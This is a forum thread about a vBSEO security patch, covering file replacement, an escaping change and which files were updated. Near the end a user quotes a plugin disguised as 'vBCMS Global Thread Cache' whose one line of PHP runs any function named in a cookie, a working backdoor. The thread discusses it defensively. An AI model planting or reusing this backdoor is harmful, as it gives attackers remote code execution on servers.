*vBSEO Security Bulletin* All Supported Versions: Patch Release

Originally Posted by faquick

I assume I could just download the updated package and replace the '

functions_vbseocp_abstract.php' file, instead of manually editing that file. Am I right?

Yes, you can over-write just that file if you wish.

Originally Posted by Talaturen

The code in that function already looked like the content of "Replace with" on my forum with vBSEO 3.6.0, so what exactly was changed in 3.6.0?

Basically
"$1"
turned into
\'$1\'

Originally Posted by Talaturen

The code in that function already looked like the content of "Replace with" on my forum with vBSEO 3.6.0, so what exactly was changed in 3.6.0?

Exact same situation here. The file was from March 2011!

It appears in the zip file that functions_vbseo.php was touched today.

Could someone double check what was done?

Originally Posted by Brian Cummiskey

Yes, you can over-write just that file if you wish.



Basically
"$1"
turned into
\'$1\'

That was also the difference I noticed, but my concern here is that 3.6.0 that I already had on my forum already was \'$1\', does this mean that 3.6.0 was not affected? And if so, then what was changed in 3.6.0 because it says that it was last updated today.

Done!

And yes, it already has the double quotes changed into single quotes.

@faquick, I did the same. But I verified with the code given able also, and it matches to the T. So I guess replacing the file will work!

Thanks for the heads up but... do you have any idea why that function ws already changed in my 'functions_vbseocp_abstract.php' file? It already had the backslashes in it and all. Weird.

Originally Posted by Talaturen

That was also the difference I noticed, but my concern here is that 3.6.0 that I already had on my forum already was \'$1\', does this mean that 3.6.0 was not affected? And if so, then what was changed in 3.6.0 because it says that it was last updated today.

My personal site was this way as well. It looks like the original release was ok, but the update did not get this code block exported with it for some reason.

If you have the escaped single quotes already, you are safe.

Originally Posted by dhabets

Exact same situation here. The file was from March 2011!

It appears in the zip file that functions_vbseo.php was touched today.

Could someone double check what was done?

I couldn't find any changes there. The only changes I've found were in vbseo/resources/scripts/vbseo_ajax.js and includes/md5_sums_crawlability_vbseo.php. I also found a bug in includes/md5_sums_crawlability_vbseo.php while checking it.
'/vbseo/resources/js' should be '/vbseo/resources/scripts', not really serious though but if you don't change it you won't know if your vBSEO js contains expected content.

I have downloaded now the actual pack for 3.5.2 on the website and have replaced the 'functions_vbseocp_abstract.php' file - how can I check if I have successfully fixed the bug?

Done thank u

Originally Posted by Brian Cummiskey

If you do see anything that doesn't look familiar, it may be wise to disable that plugin while troubleshooting further. Most reports have been tied to the global_complete hook under the core 'vBulletin' product, but may also be elsewhere.

There I have this plugin: vBCMS Global Thread Cache

Code in it is this:

PHP Code:

/* vBCMS Global Thread Cache */
(isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20); 


I assume this is ok?

I have lots of mods and I can't be sure in some plugins what they really do, but assume they are safe. Is this safe plugin?

I have version 3.6 and that line was already the same as the new line you provided, so I didnt need to replace it.

Is this fix associated with the link back exploit?

There I have this plugin: vBCMS Global Thread Cache

The code looks suspicious and I would remove this if you did not specifically install something like this.